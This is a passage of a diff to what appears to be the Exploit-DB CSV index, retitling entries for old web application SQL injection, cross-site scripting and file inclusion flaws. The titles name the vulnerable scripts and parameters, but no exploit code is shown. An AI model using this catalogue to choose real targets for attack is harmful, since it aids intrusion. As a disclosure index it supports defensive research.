Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 @@ -28973,15 +28974,15 @@ id,file,description,date,author,platform,type,port 26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 -26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 -26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - recommend.php ID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 -26381,platforms/php/webapps/26381.txt,"Chipmunk Directory - recommend.php entryID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 +26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - 'quote.php?forumID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 +26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - 'recommend.php?ID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 +26381,platforms/php/webapps/26381.txt,"Chipmunk Directory - 'recommend.php?entryID' Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - 'detail.php' HTML Injection",2005-10-22,sikikmail,php,webapps,0 -26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 +26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusions",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0 -26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26390,platforms/php/webapps/26390.txt,"saPHP Lesson - add.php forumid Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 +26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26389,platforms/php/webapps/26389.pl,"Nuked-klaN 1.7 Links Module - 'link_id' SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26390,platforms/php/webapps/26390.txt,"saPHP Lesson - 'add.php?forumid' SQL Injection",2005-10-26,almaster,php,webapps,0 26391,platforms/php/webapps/26391.html,"SiteTurn Domain Manager Pro - Admin Panel Cross-Site Scripting",2005-10-24,"farhad koosha",php,webapps,0 26392,platforms/php/webapps/26392.txt,"phpMyAdmin 2.x - queryframe.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 @@ -28993,24 +28994,24 @@ id,file,description,date,author,platform,type,port 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php gid' Parameter SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - 'play.php?gid' SQL Injection",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities",2013-06-24,"Glafkos Charalambous",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 - Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 -27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - 'mage_desc.php' Multiple SQL Injections",2006-03-31,Linux_Drox,php,webapps,0 +27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - 'template.php?provided' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0 26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php id' Parameter SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 -26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php?id' SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,php,webapps,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - 'Bug_sponsorship_list_view_inc.php' File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0 -26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 +26426,platforms/asp/webapps/26426.html,"Techno Dreams (Multiple Scripts) - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps,0 26428,platforms/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps,0 -26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 -26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 +26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - 'computers/default.asp?Direction' SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 +26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - 'reports/default.asp' Multiple SQL Injections",2005-10-27,"Dennis Rand",asp,webapps,0 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0 26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 @@ -29023,21 +29024,21 @@ id,file,description,date,author,platform,type,port 26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - 'forum.php' Multiple SQL Injections",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 -26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - comersus_Backoffice_supportError.asp error Parameter Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 +26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - 'comersus_Backoffice_supportError.asp?error' Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 -26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php type' Parameter Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php?type' Remote Code Execution",2013-06-26,infodox,php,webapps,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 26459,platforms/php/webapps/26459.txt,"PHPWebThings 0.4.4 - forum.php Cross-Site Scripting",2005-11-02,Linux_Drox,php,webapps,0 -26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - preview_cgi.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 -26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - preview_static_cgi.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 -26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - colors.php Multiple Parameter Cross-Site Scripting",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 +26461,platforms/cgi/webapps/26461.txt,"Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 +26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 +26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 -26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 +26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0 @@ -29047,13 +29048,13 @@ id,file,description,date,author,platform,type,port 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 -26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 +26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,benjilenoob,php,webapps,0 26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 -26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php id' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php find' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php?id' SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-07,"Tobias Klein",php,webapps,0 +26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php?id' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 @@ -29063,22 +29064,22 @@ id,file,description,date,author,platform,type,port 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php' File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps,0 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 -26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 +26503,platforms/php/webapps/26503.txt,"Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 +26504,platforms/php/webapps/26504.txt,"Wizz Forum - 'forumreply.php?TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 -26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe tsurl' Parameter Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe sug' Parameter Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe sug' Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 -26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 - design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 +26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - 'subscribers.tracking.edit.php?subtrackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 +26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,php,webapps,0 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 @@ -29095,67 +29096,67 @@ id,file,description,date,author,platform,type,port 26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection",2005-11-21,Lostmon,php,webapps,0 -26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - profile.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 -26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - mail.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 +26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - 'profile.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 +26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - 'mail.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - Getdox.php Directory Traversal",2005-11-22,Shell,php,webapps,0 26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 -26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 -26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - index.pl Multiple Parameter Cross-Site Scripting",2005-11-22,"Moritz Naumann",cgi,webapps,0 +26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple SQL Injections",2005-11-22,"Moritz Naumann",cgi,webapps,0 +26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 -26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 - customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 +26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,php,webapps,0 26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26560,platforms/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,php,webapps,0 -26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 - subcategory.php cl Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26563,platforms/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 - ItemInfo.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - ItemReview.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26565,platforms/php/webapps/26565.txt,"Tunez 1.21 - songinfo.php song_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26566,platforms/php/webapps/26566.txt,"Tunez 1.21 - search.php searchFor Parameter Cross-Site Scripting",2005-11-23,r0t3d3Vil,php,webapps,0 +26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 - 'subcategory.php?cl' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26563,platforms/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemInfo.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - 'ItemReview.php?item_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26565,platforms/php/webapps/26565.txt,"Tunez 1.21 - 'songinfo.php?song_id' SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26566,platforms/php/webapps/26566.txt,"Tunez 1.21 - 'search.php?searchFor' Cross-Site Scripting",2005-11-23,r0t3d3Vil,php,webapps,0 26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 - memberlist.php SQL Injection",2005-11-23,r0t,php,webapps,0 26568,platforms/php/webapps/26568.txt,"OmnistarLive 5.2 - Multiple SQL Injections",2005-11-23,r0t,php,webapps,0 26569,platforms/php/webapps/26569.txt,"PHP Labs Survey Wizard - SQL Injection",2005-11-23,r0t,php,webapps,0 26570,platforms/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26571,platforms/php/webapps/26571.txt,"Ezyhelpdesk 1.0 - Multiple SQL Injections",2005-11-23,r0t,php,webapps,0 26572,platforms/php/webapps/26572.txt,"blogBuddies 0.3 - 'index.php' u Parameter Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 -26573,platforms/php/webapps/26573.txt,"blogBuddies 0.3 - magpie_debug.php url Parameter Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 -26574,platforms/php/webapps/26574.txt,"blogBuddies 0.3 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 +26573,platforms/php/webapps/26573.txt,"blogBuddies 0.3 - 'magpie_debug.php?url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 +26574,platforms/php/webapps/26574.txt,"blogBuddies 0.3 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 26576,platforms/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injections",2005-11-23,r0t3d3Vil,php,webapps,0 -26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - search_result.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26584,platforms/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 +26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'search_result.php?cid' SQL Injection",2005-11-24,r0t,php,webapps,0 +26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'review.php?sbres_id' SQL Injection",2005-11-24,r0t,php,webapps,0 +26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'browsecats.php?cid' SQL Injection",2005-11-24,r0t,php,webapps,0 +26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'email.php?h_id' SQL Injection",2005-11-24,r0t,php,webapps,0 +26584,platforms/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 26585,platforms/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 -26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 -26590,platforms/php/webapps/26590.txt,"OvBB 0.x - profile.php userid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 +26589,platforms/php/webapps/26589.txt,"OvBB 0.x - 'thread.php?threadid' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 +26590,platforms/php/webapps/26590.txt,"OvBB 0.x - 'profile.php?userid' SQL 